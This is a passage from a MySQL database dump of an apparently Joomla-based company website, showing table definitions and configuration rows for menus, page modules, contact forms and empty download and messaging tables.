15:36:14',0,0,0,0,'display_num=0\nshow_headings=0\nshow_date=0\ndate_format=\nfilter=0\nfilter_type=title\norderby_sec=order\nshow_pagination=0\nshow_pagination_limit=0\nshow_feed_link=0\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=0\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(145,'mainmenu','CLIENTS','clients','index.php?option=com_content&view=category&id=61','component',1,0,20,0,8,0,'0000-00-00 00:00:00',0,0,0,0,'display_num=10\nshow_headings=0\nshow_date=0\ndate_format=\nfilter=0\nfilter_type=title\norderby_sec=\nshow_pagination=0\nshow_pagination_limit=0\nshow_feed_link=0\nshow_noauth=\nshow_title=0\nlink_titles=\nshow_intro=0\nshow_section=0\nlink_section=\nshow_category=0\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=0\nfeed_summary=\npage_title=COMPANY CLIENTS\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(146,'mainmenu','PARTNERS','partners','index.php?option=com_content&view=category&layout=blog&id=61','component',1,0,20,0,9,0,'0000-00-00 00:00:00',0,0,0,0,'show_description=0\nshow_description_image=0\nnum_leading_articles=0\nnum_intro_articles=0\nnum_columns=0\nnum_links=0\norderby_pri=\norderby_sec=\nmulti_column_order=0\nshow_pagination=2\nshow_pagination_results=0\nshow_feed_link=0\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=Partners\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(155,'mainmenu','SOLUTIONS','solutions','index.php?option=com_content&view=category&id=66','component',1,0,20,0,7,0,'0000-00-00 00:00:00',0,0,0,0,'display_num=0\nshow_headings=0\nshow_date=0\ndate_format=\nfilter=0\nfilter_type=title\norderby_sec=order\nshow_pagination=0\nshow_pagination_limit=0\nshow_feed_link=0\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=0\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(148,'mainmenu','CONTACTS','contacts','index.php?option=com_content&view=category&layout=blog&id=68','component',1,0,20,0,10,0,'0000-00-00 00:00:00',0,0,0,0,'show_description=0\nshow_description_image=0\nnum_leading_articles=0\nnum_intro_articles=100\nnum_columns=4\nnum_links=0\norderby_pri=order\norderby_sec=order\nmulti_column_order=1\nshow_pagination=2\nshow_pagination_results=1\nshow_feed_link=0\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=0\nshow_pdf_icon=0\nshow_print_icon=0\nshow_email_icon=0\nshow_hits=0\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(153,'unused','Category Blog','category-blog','index.php?option=com_content&view=category&layout=blog&id=62','component',1,0,20,0,4,0,'0000-00-00 00:00:00',0,0,0,0,'show_description=1\nshow_description_image=1\nnum_leading_articles=0\nnum_intro_articles=100\nnum_columns=1\nnum_links=100\norderby_pri=\norderby_sec=\nmulti_column_order=0\nshow_pagination=1\nshow_pagination_results=1\nshow_feed_link=1\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=1\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(154,'privacy-policy','PRIVACY POLICY','privacy-policy','index.php?option=com_content&view=article&id=296','component',1,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(156,'mainmenu','dddd','dddd','index.php?option=com_content&view=category&layout=blog&id=65','component',-2,0,20,0,2,0,'0000-00-00 00:00:00',0,0,0,0,'show_description=0\nshow_description_image=0\nnum_leading_articles=1\nnum_intro_articles=100\nnum_columns=3\nnum_links=100\norderby_pri=\norderby_sec=\nmulti_column_order=0\nshow_pagination=2\nshow_pagination_results=1\nshow_feed_link=1\nshow_noauth=\nshow_title=0\nlink_titles=\nshow_intro=0\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(157,'mainmenu','ssss','ssss','index.php?option=com_content&view=category&layout=blog&id=70','component',-2,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_description=0\nshow_description_image=0\nnum_leading_articles=0\nnum_intro_articles=0\nnum_columns=2\nnum_links=4\norderby_pri=\norderby_sec=\nmulti_column_order=0\nshow_pagination=2\nshow_pagination_results=1\nshow_feed_link=1\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(158,'unused','Careers at FIT','general-top-article','index.php?option=com_content&view=article&id=358','component',1,0,20,0,5,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=0\nlink_titles=0\nshow_intro=0\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=0\nshow_pdf_icon=0\nshow_print_icon=0\nshow_email_icon=0\nshow_hits=0\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0); /*!40000 ALTER TABLE `bak_fit_bss_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_menu_types` -- DROP TABLE IF EXISTS `bak_fit_bss_menu_types`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_menu_types` ( `id` int(10) unsigned NOT NULL auto_increment, `menutype` varchar(75) NOT NULL default '', `title` varchar(255) NOT NULL default '', `description` varchar(255) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_menu_types` -- LOCK TABLES `bak_fit_bss_menu_types` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_menu_types` DISABLE KEYS */; INSERT INTO `bak_fit_bss_menu_types` VALUES (1,'mainmenu','Main Menu','The main menu for the site'),(7,'privacy-policy','PRIVACY POLICY',''),(6,'unused','unused',''); /*!40000 ALTER TABLE `bak_fit_bss_menu_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_messages` -- DROP TABLE IF EXISTS `bak_fit_bss_messages`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_messages` ( `message_id` int(10) unsigned NOT NULL auto_increment, `user_id_from` int(10) unsigned NOT NULL default '0', `user_id_to` int(10) unsigned NOT NULL default '0', `folder_id` int(10) unsigned NOT NULL default '0', `date_time` datetime NOT NULL default '0000-00-00 00:00:00', `state` int(11) NOT NULL default '0', `priority` int(1) unsigned NOT NULL default '0', `subject` text NOT NULL, `message` text NOT NULL, PRIMARY KEY (`message_id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_messages` -- LOCK TABLES `bak_fit_bss_messages` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_messages` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_messages_cfg` -- DROP TABLE IF EXISTS `bak_fit_bss_messages_cfg`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_messages_cfg` ( `user_id` int(10) unsigned NOT NULL default '0', `cfg_name` varchar(100) NOT NULL default '', `cfg_value` varchar(255) NOT NULL default '' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_messages_cfg` -- LOCK TABLES `bak_fit_bss_messages_cfg` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_messages_cfg` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_messages_cfg` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_migration_backlinks` -- DROP TABLE IF EXISTS `bak_fit_bss_migration_backlinks`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_migration_backlinks` ( `itemid` int(11) NOT NULL default '0', `name` varchar(100) NOT NULL default '', `url` text NOT NULL, `sefurl` text NOT NULL, `newurl` text NOT NULL, PRIMARY KEY (`itemid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_migration_backlinks` -- LOCK TABLES `bak_fit_bss_migration_backlinks` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_migration_backlinks` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_migration_backlinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_modules` -- DROP TABLE IF EXISTS `bak_fit_bss_modules`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_modules` ( `id` int(11) NOT NULL auto_increment, `title` text NOT NULL, `content` text NOT NULL, `ordering` int(11) NOT NULL default '0', `position` varchar(50) default NULL, `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `module` varchar(50) default NULL, `numnews` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `showtitle` tinyint(3) unsigned NOT NULL default '1', `params` text NOT NULL, `iscore` tinyint(4) NOT NULL default '0', `client_id` tinyint(4) NOT NULL default '0', `control` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=238 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_modules` -- LOCK TABLES `bak_fit_bss_modules` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_modules` DISABLE KEYS */; INSERT INTO `bak_fit_bss_modules` VALUES (2,'Login','',1,'login',0,'0000-00-00 00:00:00',1,'mod_login',0,0,1,'',1,1,''),(3,'Popular','',3,'cpanel',0,'0000-00-00 00:00:00',1,'mod_popular',0,2,1,'',0,1,''),(5,'Menu Stats','',5,'cpanel',0,'0000-00-00 00:00:00',1,'mod_stats',0,2,1,'',0,1,''),(6,'Unread Messages','',1,'header',0,'0000-00-00 00:00:00',1,'mod_unread',0,2,1,'',1,1,''),(7,'Online Users','',2,'header',0,'0000-00-00 00:00:00',1,'mod_online',0,2,1,'',1,1,''),(8,'Toolbar','',1,'toolbar',0,'0000-00-00 00:00:00',1,'mod_toolbar',0,2,1,'',1,1,''),(9,'Quick Icons','',1,'icon',0,'0000-00-00 00:00:00',1,'mod_quickicon',0,2,1,'',1,1,''),(10,'Logged in Users','',2,'cpanel',0,'0000-00-00 00:00:00',1,'mod_logged',0,2,1,'',0,1,''),(11,'Footer','',0,'footer',0,'0000-00-00 00:00:00',1,'mod_footer',0,0,1,'',1,1,''),(12,'Admin Menu','',1,'menu',0,'0000-00-00 00:00:00',1,'mod_menu',0,2,1,'',0,1,''),(13,'Admin SubMenu','',1,'submenu',0,'0000-00-00 00:00:00',1,'mod_submenu',0,2,1,'',0,1,''),(14,'User Status','',1,'status',0,'0000-00-00 00:00:00',1,'mod_status',0,2,1,'',0,1,''),(15,'Title','',1,'title',0,'0000-00-00 00:00:00',1,'mod_title',0,2,1,'',0,1,''),(17,'Direct Translation','',0,'status',0,'0000-00-00 00:00:00',1,'mod_translate',0,2,0,'',0,1,''),(225,'PRODUCTS','',0,'footer_black_2',0,'0000-00-00 00:00:00',0,'mod_list_articles',0,0,1,'mycategory=65\nordering=alpha\nwidth=419px\nul_count=1\ncount_art=8\nreadmore=no\nreadmore_text=Read More\nmymenuitem=1\ncache=1\ncache_time=900\n\n',0,0,''),(226,'Contact Us Iframe','',3,'middle_black_1',0,'0000-00-00 00:00:00',1,'mod_iframe_loader',0,0,1,'position=contact_us\nwidth=280\nheight=400\nid=\ncache=1\ncache_time=900\n\n',0,0,''),(227,'Contact Us','',0,'contact_us',0,'0000-00-00 00:00:00',1,'mod_chronocontact',0,0,0,'cache=0\nchronoformname=ContactUs\nmoduleclass_sfx=none\n\n',0,0,''),(228,'Partners iframe','',0,'middle_clients',0,'0000-00-00 00:00:00',1,'mod_iframe_loader',0,0,1,'position=partners\nwidth=990\nheight=244\nid=\ncache=1\ncache_time=900\n\n',0,0,''),(229,'Partners ','',0,'partners',0,'0000-00-00 00:00:00',1,'mod_djimageslider',0,0,1,'slider_source=0\nslider_type=0\nmootools=0\nlink_image=1\nimage_folder=images/stories/partners\nlink=\nshow_title=0\nshow_desc=0\nshow_readmore=0\nlink_title=0\nlink_desc=0\nlimit_desc=\nimage_width=304\nimage_height=244\nfit_to=0\nvisible_images=2\nspace_between_images=380\nmax_images=20\nsort_by=1\neffect=Elastic\nautoplay=1\nshow_buttons=0\nshow_arrows=0\nshow_custom_nav=0\ndesc_width=\ndesc_bottom=0\ndesc_horizontal=0\nleft_arrow=\nright_arrow=\nplay_button=\npause_button=\narrows_top=30\narrows_horizontal=5\neffect_type=0\nduration=\ndelay=\npreload=800\nmoduleclass_sfx=\ncache=0\n\n',0,0,''),(221,'TESTIMONIALS','',0,'footer_black_1',0,'0000-00-00 00:00:00',0,'mod_jbfaq',0,0,1,'readmore=no\ntags=<a><ul><li><h1><h2><h3><h4><h5><h6><b><em><i><strong><blockquote><dd><dt><small><u><br><img><p><span><b>\\n\nreadmore_text=Read More ...\nbuttons=no\nid=\ncount=1\nordering=c_dsc\nuser_id=0\nshow_front=1\nmycategory=64\nmoduleclass_sfx=\nimgModule=\ncache=1\ncache_time=900\n\n',0,0,''),(222,'WHY FIT','',2,'forms',0,'0000-00-00 00:00:00',1,'mod_vertical_article',0,0,1,'image=\nimage_inner=\nart_id=286\nmymenuitem=143\nwidth=280px\nclassDiv=col1\n\n',0,0,''),(223,'KEY SUCCESS FACTORS','',0,'middle_black_3',0,'0000-00-00 00:00:00',1,'mod_vertical_article',0,0,1,'image=\nimage_inner=\nart_id=291\nmymenuitem=143\nwidth=550px\nclassDiv=col3\n\n',0,0,''),(224,'WHO ARE WE','',4,'middle_black_1',0,'0000-00-00 00:00:00',1,'mod_vertical_article',0,0,1,'image=\nimage_inner=\nart_id=284\nmymenuitem=143\nwidth=312px\nclassDiv=col1\n\n',0,0,''),(219,'REQUEST A CALL Iframe','',3,'forms',0,'0000-00-00 00:00:00',1,'mod_iframe_loader',0,0,1,'position=request_call\nwidth=100%\nheight=250\nid=\ncache=1\ncache_time=900\n\n',0,0,''),(220,'REQUEST A CALL','',0,'request_call',0,'0000-00-00 00:00:00',1,'mod_chronocontact',0,0,1,'cache=0\nchronoformname=RequestForm\nmoduleclass_sfx=rowForm\n\n',0,0,''),(217,'Terms Of Use','',7,'top_article',0,'0000-00-00 00:00:00',1,'mod_top_article',0,0,1,'image=\nbg_color=banner1\nimage_inner=\ncol_count=3\nart_id=297\nheight=100%\nmymenuitem=154\n\n',0,0,''),(218,'Follow us','',0,'footer',0,'0000-00-00 00:00:00',1,'mod_stack',0,0,1,'text1=1\nimage1=footer_icon1.jpg\nlink1=#\ntext2=2\nimage2=footer_icon2.jpg\nlink2=#\ntext3=3\nimage3=footer_icon3.jpg\nlink3=#\ntext4=4\nimage4=footer_icon4.jpg\nlink4=#\ntext5=\nimage5=\nlink5=\ntext6=\nimage6=\nlink6=\ntext7=\nimage7=\nlink7=\ntext8=\nimage8=\nlink8=\ntext9=\nimage9=\nlink9=\ntext10=\nimage10=\nlink10=\n\n',0,0,''),(216,'Privacy policy','',0,'policy',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,1,'menutype=privacy-policy\nmenu_style=list\nstartLevel=0\nendLevel=0\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=\nmoduleclass_sfx=\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',0,0,''),(215,'footer menu','',0,'footer',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,1,'menutype=mainmenu\nmenu_style=list_flat\nstartLevel=0\nendLevel=0\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=\nmoduleclass_sfx=\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\\|\nend_spacer=\n\n',0,0,''),(214,'clients iframe','',2,'middle_clients',0,'0000-00-00 00:00:00',1,'mod_iframe_loader',0,0,1,'position=clients\nwidth=990\nheight=1000\nid=\ncache=1\ncache_time=900\n\n',0,0,''),(213,'clients','',2,'clients',0,'0000-00-00 00:00:00',0,'mod_djimageslider',0,0,1,'slider_source=0\nslider_type=0\nmootools=0\nlink_image=1\nimage_folder=images/stories/clients\nlink=\nshow_title=0\nshow_desc=0\nshow_readmore=0\nlink_title=0\nlink_desc=0\nlimit_desc=\nimage_width=214\nimage_height=144\nfit_to=0\nvisible_images=4\nspace_between_images=40\nmax_images=20\nsort_by=1\neffect=Elastic\nautoplay=1\nshow_buttons=0\nshow_arrows=1\nshow_custom_nav=0\ndesc_width=\ndesc_bottom=0\ndesc_horizontal=0\nleft_arrow=\nright_arrow=\nplay_button=\npause_button=\narrows_top=30\narrows_horizontal=5\neffect_type=0\nduration=\ndelay=\npreload=800\nmoduleclass_sfx=\ncache=0\n\n',0,0,''); /*!40000 ALTER TABLE `bak_fit_bss_modules` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_modules_menu` -- DROP TABLE IF EXISTS `bak_fit_bss_modules_menu`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_modules_menu` ( `moduleid` int(11) NOT NULL default '0', `menuid` int(11) NOT NULL default '0', PRIMARY KEY (`moduleid`,`menuid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_modules_menu` -- LOCK TABLES `bak_fit_bss_modules_menu` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_modules_menu` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_modules_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_newsfeeds` -- DROP TABLE IF EXISTS `bak_fit_bss_newsfeeds`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_newsfeeds` ( `catid` int(11) NOT NULL default '0', `id` int(11) NOT NULL auto_increment, `name` text NOT NULL, `alias` varchar(255) NOT NULL default '', `link` text NOT NULL, `filename` varchar(200) default NULL, `published` tinyint(1) NOT NULL default '0', `numarticles` int(11) unsigned NOT NULL default '1', `cache_time` int(11) unsigned NOT NULL default '3600', `checked_out` tinyint(3) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `rtl` tinyint(4) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_newsfeeds` -- LOCK TABLES `bak_fit_bss_newsfeeds` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_newsfeeds` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_newsfeeds` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocadownload` -- DROP TABLE IF EXISTS `bak_fit_bss_phocadownload`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocadownload` ( `id` int(11) unsigned NOT NULL auto_increment, `catid` int(11) NOT NULL default '0', `sectionid` int(11) NOT NULL default '0', `sid` int(11) NOT NULL default '0', `owner_id` int(11) NOT NULL default '0', `title` varchar(250) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `filename` varchar(250) NOT NULL default '', `filename_play` varchar(250) NOT NULL default '', `filename_preview` varchar(250) NOT NULL default '', `filesize` int(11) NOT NULL default '0', `author` varchar(255) NOT NULL default '', `author_email` varchar(255) NOT NULL default '', `author_url` varchar(255) NOT NULL default '', `license` varchar(255) NOT NULL default '', `license_url` varchar(255) NOT NULL default '', `image_filename` varchar(255) NOT NULL default '', `image_filename_spec1` varchar(255) NOT NULL default '', `image_filename_spec2` varchar(255) NOT NULL default '', `image_download` varchar(255) NOT NULL default '', `link_external` varchar(255) NOT NULL default '', `description` text, `version` varchar(255) NOT NULL default '', `directlink` tinyint(1) NOT NULL default '0', `date` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `hits` int(11) NOT NULL default '0', `textonly` tinyint(1) NOT NULL default '0', `published` tinyint(1) NOT NULL default '0', `approved` tinyint(1) NOT NULL default '0', `checked_out` int(11) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `confirm_license` int(11) NOT NULL default '0', `unaccessible_file` int(11) NOT NULL default '0', `params` text, `metakey` text, `metadesc` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocadownload` -- LOCK TABLES `bak_fit_bss_phocadownload` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocadownload_categories` -- DROP TABLE IF EXISTS `bak_fit_bss_phocadownload_categories`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocadownload_categories` ( `id` int(11) NOT NULL auto_increment, `parent_id` int(11) NOT NULL default '0', `section` int(11) NOT NULL default '0', `title` varchar(255) NOT NULL default '', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `image` varchar(255) NOT NULL default '', `image_position` varchar(30) NOT NULL default '', `description` text, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `editor` varchar(50) default NULL, `ordering` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `uploaduserid` text, `accessuserid` text, `deleteuserid` text, `date` datetime NOT NULL default '0000-00-00 00:00:00', `count` int(11) NOT NULL default '0', `params` text, `metakey` text, `metadesc` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocadownload_categories` -- LOCK TABLES `bak_fit_bss_phocadownload_categories` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_categories` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocadownload_licenses` -- DROP TABLE IF EXISTS `bak_fit_bss_phocadownload_licenses`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocadownload_licenses` ( `id` int(11) NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `description` text, `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocadownload_licenses` -- LOCK TABLES `bak_fit_bss_phocadownload_licenses` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_licenses` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_licenses` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocadownload_sections` -- DROP TABLE IF EXISTS `bak_fit_bss_phocadownload_sections`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocadownload_sections` ( `id` int(11) NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `image` text, `scope` varchar(50) NOT NULL default '', `image_position` varchar(30) NOT NULL default '', `description` text, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `date` datetime NOT NULL default '0000-00-00 00:00:00', `count` int(11) NOT NULL default '0', `params` text, `metakey` text, `metadesc` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocadownload_sections` -- LOCK TABLES `bak_fit_bss_phocadownload_sections` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_sections` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_sections` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocadownload_settings` -- DROP TABLE IF EXISTS `bak_fit_bss_phocadownload_settings`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocadownload_settings` ( `id` int(11) unsigned NOT NULL auto_increment, `title` varchar(250) NOT NULL default '', `value` text, `values` text, `type` varchar(50) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_phocadownload_settings` -- LOCK TABLES `bak_fit_bss_phocadownload_settings` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_settings` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_phocadownload_settings` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_phocadownload_user_stat` -- DROP TABLE IF EXISTS `bak_fit_bss_phocadownload_user_stat`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_phocadownload_user_stat` ( `id` int(11) NOT NULL auto_increment, `fileid` int(11) NOT NULL default '0', `userid` int(11) NOT NULL default '0', `count` int(11) NOT NULL default '0', `date` datetime NOT NULL default 